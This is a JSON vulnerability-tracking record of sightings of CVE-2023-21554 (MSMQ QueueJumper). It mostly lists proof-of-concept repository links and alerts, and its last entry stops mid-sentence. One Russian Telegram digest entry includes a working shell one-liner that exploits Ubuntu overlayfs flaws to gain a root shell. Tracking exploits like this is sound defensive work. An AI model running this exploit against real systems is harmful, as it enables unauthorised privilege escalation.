{"vulnerability": "CVE-2023-21554", "sightings": [{"uuid": "25449f71-0348-4ff9-a025-70b36aa90f0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "2de3b4cc-12d1-45df-8521-bd565c055f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "ef25298a-5edc-40ec-8ece-a180a393065b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:50.000000Z"}, {"uuid": "e0ca0571-75c3-4dd4-84d3-8ff35d8a91da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c5e8ba0909b3041ce8ec8cdadd208884", "content": "", "creation_timestamp": "2025-10-27T10:19:18.000000Z"}, {"uuid": "0f209e5f-f595-494b-8e86-342461c88758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb", "content": "", "creation_timestamp": "2023-09-05T13:26:18.000000Z"}, {"uuid": "e5af0f23-2530-448c-b3e3-3a7e0bffc9b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 
"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4220", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/C3r7/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-19T13:32:30.000000Z"}, {"uuid": "d7c6d418-587a-4f24-8453-22c37e165eba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1005", "content": "", "creation_timestamp": "2023-04-12T14:53:28.000000Z"}, {"uuid": "040d2aac-9372-4c11-a294-c02fd6082682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4170", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/select275/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-13T14:15:46.000000Z"}, {"uuid": "0f29c90f-d46d-4525-973d-7543ec9b33bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 Windows MessageQueuing 
PoC\uff0c\u5206\u6790\u89c1 https://www.zoemurmure.top/posts/cve_2023_21554/\nURL\uff1ahttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-05-18T10:43:53.000000Z"}, {"uuid": "fe3aa6ff-4951-41af-a7e1-54dec954850d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4202", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/C00k3rbkr/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-17T16:54:57.000000Z"}, {"uuid": "08ee37b4-ab41-4743-8acb-1c60563b376b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4182", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aProof of Concept for Windows Message Queuing also known as CVE-2023-21554\nURL\uff1ahttps://github.com/xhshes/CVE-2023-21554-QueueJumper\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-15T02:26:48.000000Z"}, {"uuid": "4998fb80-59a2-439f-9efd-7d7755625441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4181", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing 
(MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/tonarni/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-14T17:41:59.000000Z"}, {"uuid": "48b75f8c-4c8d-4834-819d-384e1ce3c5fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4176", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/checksec0xint/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-14T05:22:33.000000Z"}, {"uuid": "27f29ada-f831-4935-a0bf-abad3d4504c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4201", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/10xeye/CVE-2023-21554-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-17T12:30:44.000000Z"}, {"uuid": "93879791-7f82-4dcb-aa82-a56e7c24ca1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4227", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1ametasploit module for CVE-2023-21554 remote code execution in msmq service which dont require any authentication and user 
interaction\nURL\uff1ahttps://github.com/g3tS3rvic3s/CVE-2023-21554-RCE-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-20T18:14:06.000000Z"}, {"uuid": "9cee0cc0-c97d-437b-998d-83e27858ec4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/g1x-r/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-20T14:21:31.000000Z"}, {"uuid": "79f0e701-ab28-4e66-a1de-6ae95eb08f5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4162", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aProof-of-Concept for CVE-2023-21554 vulnerability recently discovered in Windows MSMQ\nURL\uff1ahttps://github.com/00hashmaker/CVE-2023-21554-0day\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-12T21:51:51.000000Z"}, {"uuid": "1452f791-1b63-4004-8f7f-d92ad92d0c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4163", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aPoC for the MSMQ vulnerability recently discovered also known as 
CVE-2023-21554\nURL\uff1ahttps://github.com/hash0x1/CVE-2023-21554\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-12T22:42:03.000000Z"}, {"uuid": "e7f6e592-f8aa-450b-a6af-1672cc30c460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4185", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/durte/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-15T14:29:49.000000Z"}, {"uuid": "95a42510-d9ee-462b-9e72-a45be399c3d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/TFgIrRyFVdmt-_iXx8f0LX8Ka84NvNMzkX0RvLq3uNFE64w", "content": "", "creation_timestamp": "2025-10-10T03:00:06.000000Z"}, {"uuid": "36e7f9f2-06fa-4096-b719-fe83c3fdef7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/bh_cat/202", "content": "\ud83d\udcd5 \u041f\u043e\u0434\u0431\u043e\u0440\u043e\u0447\u043a\u0430 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udca1 Atlassian Confluence Server - Improper Authorization\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-22518\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c 
\u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u0438\u043c\u0435\u044e\u0449\u0438\u043c \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Confluence, \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 Confluence \u0438, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\n\ud83d\udca1 Microsoft Message Queuing Remote Code Execution\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-21554\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435: \n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u043c\u0443 \u0430\u0433\u0435\u043d\u0442\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c 
RCE-\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 Microsoft Messaging Queue.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Google Chrome heap buffer overflow in WebP \n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-4863\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x: \n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n-  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u044c \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u043f\u0430\u043c\u044f\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e HTML-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Ubuntu Privilege Escalation (Double)\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-2640\nCVE-2023-32629\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u041d\u0430 
\u044f\u0434\u0440\u0430\u0445 Ubuntu, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u043a\u0430\u043a c914c0e27eb0, \u0442\u0430\u043a \u0438 \"UBUNTU: SAUCE: overlayfs: \u041f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f trusted.overlayfs.* xattrs\", \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u043d\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0434\u043b\u044f \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0438\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0434\u043b\u044f \u0432\u0435\u0440\u0445\u043d\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n- \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u0412 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u043e\u0432\u0435\u0440\u043b\u0435\u0439\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b ovl_copy_up_meta_inode_data 
\u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 ovl_do_setxattr.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#poc", "creation_timestamp": "2023-11-10T11:18:42.000000Z"}, {"uuid": "a61d0762-991d-43e4-ae92-a4b730aaf5d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/302", "content": "Top Security News for 13/04/2023\n\nAn emperical and practical guide to LLM hacking\nhttps://www.reddit.com/r/netsec/comments/12jrurl/an_emperical_and_practical_guide_to_llm_hacking/ \n\nWhy does it take so long for security teams to remediate vulnerabilities?\nhttps://malware.news/t/why-does-it-take-so-long-for-security-teams-to-remediate-vulnerabilities/68702#post_1 \n\nUrgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit\nhttps://thehackernews.com/2023/04/urgent-microsoft-issues-patches-for-97.html \n\nRooting a Common-Criteria Certified Printer to Improve OPSEC\nhttps://www.reddit.com/r/netsec/comments/12jkjeq/rooting_a_commoncriteria_certified_printer_to/ \n\nAI Tasked With 'Destroying Humanity' Now 'Working on Control Over Humanity Through Manipulation'\nhttps://www.vice.com/en_us/article/z3mxe3/ai-tasked-with-destroying-humanity-now-working-on-control-over-humanity-through-manipulation \n\n[CVE-2023-21554] MSMQ (tcp/1801) Remote Code Execution (CVSS 
9.8)\nhttps://www.reddit.com/r/netsec/comments/12jet9f/cve202321554_msmq_tcp1801_remote_code_execution/ \n\nAddressing National Cyber Strategy.\nhttps://thecyberwire.com/podcasts/caveat/168/notes \n\nFollowing the Lazarus group by tracking DeathNote campaign\nhttps://www.reddit.com/r/netsec/comments/12jnxa4/following_the_lazarus_group_by_tracking_deathnote/ \n\nQakbot Being Distributed in Korea Through Email Hijacking\nhttps://malware.news/t/qakbot-being-distributed-in-korea-through-email-hijacking/68698#post_1 \n\nBotconf 2023 Wrap-Up Day #1\nhttps://blog.rootshell.be/2023/04/12/botconf-2023-wrap-up-day-1/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2023-04-13T07:00:04.000000Z"}, {"uuid": "d33bee6b-8c53-49a0-84cf-a3eb9a01322e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/17", "content": "\u0412 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u043a\u043e\u043c\u0430\u043d\u0434\u044b Check Point \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 MSMQ (Microsoft Message Queuing) MSMQ - \u044d\u0442\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u0430\u044f Microsoft \u0432 1999 \u0433\u043e\u0434\u0443, 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u043f\u043e \u0441\u0435\u0439 \u0434\u0435\u043d\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430 \u043d\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows Server. \n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430\u044f  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 QueueJumper, \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2023-21554 \u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 9.8 CRITICAL \u043f\u043e CVSS3.0 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c Windows Server \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 mqsvc.exe \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e 
